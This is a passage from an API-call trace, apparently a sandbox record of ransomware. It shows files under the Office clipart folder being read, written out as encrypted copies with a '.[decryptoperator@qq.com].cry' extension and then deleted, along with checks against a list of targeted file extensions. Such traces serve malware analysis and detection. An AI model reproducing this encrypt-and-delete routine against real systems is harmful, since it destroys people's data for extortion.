lpNewFilePointer=0x0) returned 1 [0052.694] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02559_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0052.694] GetLastError () returned 0x0 [0052.694] ReadFile (in: hFile=0x204, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x19e8, lpOverlapped=0x0) returned 1 [0052.708] WriteFile (in: hFile=0x1bc, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x19f0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x19f0, lpOverlapped=0x0) returned 1 [0052.709] ReadFile (in: hFile=0x204, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.709] WriteFile (in: hFile=0x1bc, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.709] SetEndOfFile (hFile=0x1bc) returned 1 [0052.709] CloseHandle (hObject=0x1bc) returned 1 [0052.709] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.709] SetEndOfFile (hFile=0x204) returned 1 [0052.710] CloseHandle (hObject=0x204) returned 1 [0052.710] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0052.710] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02559_.wmf")) returned 1 [0052.710] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 63 [0052.710] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 63 [0052.710] lstrlenW (lpString=".doc") returned 4 [0052.710] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0052.710] lstrlenW (lpString=".docx") returned 5 [0052.710] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0052.711] lstrlenW (lpString=".pdf") returned 4 [0052.711] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0052.711] lstrlenW (lpString=".xls") returned 4 [0052.711] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0052.711] lstrlenW (lpString=".xlsx") returned 5 [0052.711] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0052.711] lstrlenW (lpString=".ppt") returned 4 [0052.711] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0052.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 63 [0052.711] lstrlenW (lpString=".zip") returned 4 [0052.711] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0052.711] lstrlenW (lpString=".rar") returned 4 [0052.711] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0052.711] lstrlenW (lpString=".bz2") returned 4 [0052.711] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0052.711] lstrlenW (lpString=".7z") returned 3 [0052.711] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0052.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 63 [0052.711] lstrlenW (lpString=".dbf") returned 4 [0052.711] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0052.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 63 [0052.711] lstrlenW (lpString=".1cd") returned 4 [0052.711] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0052.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 63 [0052.711] lstrlenW (lpString=".jpg") returned 4 [0052.711] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0052.712] GetFileSizeEx (in: hFile=0x204, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=2108) returned 1 [0052.712] CloseHandle (hObject=0x204) returned 1 [0052.712] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02724_.wmf")) returned 0x20 [0052.712] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02724_.wmf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0052.712] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02724_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0052.712] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.712] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.712] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02724_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0052.713] GetLastError () returned 0x0 [0052.713] ReadFile (in: hFile=0x204, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x83c, lpOverlapped=0x0) returned 1 [0052.889] WriteFile (in: hFile=0x1bc, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x840, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x840, lpOverlapped=0x0) returned 1 [0052.890] ReadFile (in: hFile=0x204, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.890] WriteFile (in: hFile=0x1bc, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.890] SetEndOfFile (hFile=0x1bc) returned 1 [0052.952] CloseHandle (hObject=0x1bc) returned 1 [0052.953] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.953] SetEndOfFile (hFile=0x204) returned 1 [0052.953] CloseHandle (hObject=0x204) returned 1 [0052.953] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0052.954] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02724_.wmf")) returned 1 [0052.984] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 63 [0052.984] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 63 [0052.984] lstrlenW (lpString=".doc") returned 4 [0052.984] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0052.984] lstrlenW (lpString=".docx") returned 5 [0052.984] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0052.984] lstrlenW (lpString=".pdf") returned 4 [0052.984] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0052.984] lstrlenW (lpString=".xls") returned 4 [0052.984] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0052.984] lstrlenW (lpString=".xlsx") returned 5 [0052.984] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0052.984] lstrlenW (lpString=".ppt") returned 4 [0052.984] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0052.984] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 63 [0052.984] lstrlenW (lpString=".zip") returned 4 [0052.984] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0052.984] lstrlenW (lpString=".rar") returned 4 [0052.984] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0052.984] lstrlenW (lpString=".bz2") returned 4 [0052.984] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0052.984] lstrlenW (lpString=".7z") returned 3 [0052.984] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0052.984] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 63 [0052.984] lstrlenW (lpString=".dbf") returned 4 [0052.985] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0052.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 63 [0052.985] lstrlenW (lpString=".1cd") returned 4 [0052.985] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0052.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 63 [0052.985] lstrlenW (lpString=".jpg") returned 4 [0052.985] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0052.993] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.993] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.994] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04196_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0052.994] GetLastError () returned 0x0 [0052.994] ReadFile (in: hFile=0x1c0, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0xc48, lpOverlapped=0x0) returned 1 [0053.037] WriteFile (in: hFile=0x1f0, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xc50, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xc50, lpOverlapped=0x0) returned 1 [0053.038] ReadFile (in: hFile=0x1c0, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.038] WriteFile (in: hFile=0x1f0, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.038] SetEndOfFile (hFile=0x1f0) returned 1 [0053.039] CloseHandle (hObject=0x1f0) returned 1 [0053.039] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.039] SetEndOfFile (hFile=0x1c0) returned 1 [0053.039] CloseHandle (hObject=0x1c0) returned 1 [0053.039] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0053.040] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04196_.wmf")) returned 1 [0053.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 63 [0053.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 63 [0053.040] lstrlenW (lpString=".doc") returned 4 [0053.040] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.040] lstrlenW (lpString=".docx") returned 5 [0053.040] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.040] lstrlenW (lpString=".pdf") returned 4 [0053.040] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.040] lstrlenW (lpString=".xls") returned 4 [0053.040] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.040] lstrlenW (lpString=".xlsx") returned 5 [0053.040] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.040] lstrlenW (lpString=".ppt") returned 4 [0053.040] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 63 [0053.040] lstrlenW (lpString=".zip") returned 4 [0053.040] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.040] lstrlenW (lpString=".rar") returned 4 [0053.040] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.040] lstrlenW (lpString=".bz2") returned 4 [0053.040] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.041] lstrlenW (lpString=".7z") returned 3 [0053.041] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 63 [0053.041] lstrlenW (lpString=".dbf") returned 4 [0053.041] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 63 [0053.041] lstrlenW (lpString=".1cd") returned 4 [0053.041] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 63 [0053.041] lstrlenW (lpString=".jpg") returned 4 [0053.041] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.041] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=2016) returned 1 [0053.041] CloseHandle (hObject=0x1c0) returned 1 [0053.042] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04269_.wmf")) returned 0x20 [0053.042] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04269_.wmf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0053.042] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04269_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0053.042] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.042] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.042] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04269_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0053.042] GetLastError () returned 0x0 [0053.042] ReadFile (in: hFile=0x1c0, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x7e0, lpOverlapped=0x0) returned 1 [0053.073] WriteFile (in: hFile=0x1f0, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x7f0, lpOverlapped=0x0) returned 1 [0053.074] ReadFile (in: hFile=0x1c0, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.074] WriteFile (in: hFile=0x1f0, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.074] SetEndOfFile (hFile=0x1f0) returned 1 [0053.074] CloseHandle (hObject=0x1f0) returned 1 [0053.074] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.074] SetEndOfFile (hFile=0x1c0) returned 1 [0053.075] CloseHandle (hObject=0x1c0) returned 1 [0053.075] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0053.075] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04269_.wmf")) returned 1 [0053.076] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 63 [0053.076] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 63 [0053.076] lstrlenW (lpString=".doc") returned 4 [0053.076] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.076] lstrlenW (lpString=".docx") returned 5 [0053.076] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.076] lstrlenW (lpString=".pdf") returned 4 [0053.076] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.076] lstrlenW (lpString=".xls") returned 4 [0053.076] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.076] lstrlenW (lpString=".xlsx") returned 5 [0053.076] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.076] lstrlenW (lpString=".ppt") returned 4 [0053.076] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.076] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 63 [0053.076] lstrlenW (lpString=".zip") returned 4 [0053.076] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.076] lstrlenW (lpString=".rar") returned 4 [0053.076] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.076] lstrlenW (lpString=".bz2") returned 4 [0053.076] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.076] lstrlenW (lpString=".7z") returned 3 [0053.076] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.076] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 63 [0053.076] lstrlenW (lpString=".dbf") returned 4 [0053.076] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.076] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 63 [0053.076] lstrlenW (lpString=".1cd") returned 4 [0053.076] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.076] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 63 [0053.076] lstrlenW (lpString=".jpg") returned 4 [0053.076] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.077] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=3348) returned 1 [0053.077] CloseHandle (hObject=0x1c0) returned 1 [0053.077] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04326_.wmf")) returned 0x20 [0053.077] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04326_.wmf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0053.077] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04326_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0053.077] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.077] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.077] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04326_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0053.077] GetLastError () returned 0x0 [0053.077] ReadFile (in: hFile=0x1c0, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0xd14, lpOverlapped=0x0) returned 1 [0053.168] WriteFile (in: hFile=0x1f0, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xd20, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xd20, lpOverlapped=0x0) returned 1 [0053.169] ReadFile (in: hFile=0x1c0, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.169] WriteFile (in: hFile=0x1f0, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.169] SetEndOfFile (hFile=0x1f0) returned 1 [0053.169] CloseHandle (hObject=0x1f0) returned 1 [0053.169] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.169] SetEndOfFile (hFile=0x1c0) returned 1 [0053.170] CloseHandle (hObject=0x1c0) returned 1 [0053.170] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0053.170] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04326_.wmf")) returned 1 [0053.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 63 [0053.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 63 [0053.171] lstrlenW (lpString=".doc") returned 4 [0053.171] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.171] lstrlenW (lpString=".docx") returned 5 [0053.171] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.171] lstrlenW (lpString=".pdf") returned 4 [0053.171] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.171] lstrlenW (lpString=".xls") returned 4 [0053.171] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.171] lstrlenW (lpString=".xlsx") returned 5 [0053.171] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.171] lstrlenW (lpString=".ppt") returned 4 [0053.171] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 63 [0053.171] lstrlenW (lpString=".zip") returned 4 [0053.171] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.171] lstrlenW (lpString=".rar") returned 4 [0053.171] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.171] lstrlenW (lpString=".bz2") returned 4 [0053.171] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.171] lstrlenW (lpString=".7z") returned 3 [0053.171] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.171] lstrlenW (lpString="C:\\Program Files\\Microsoft 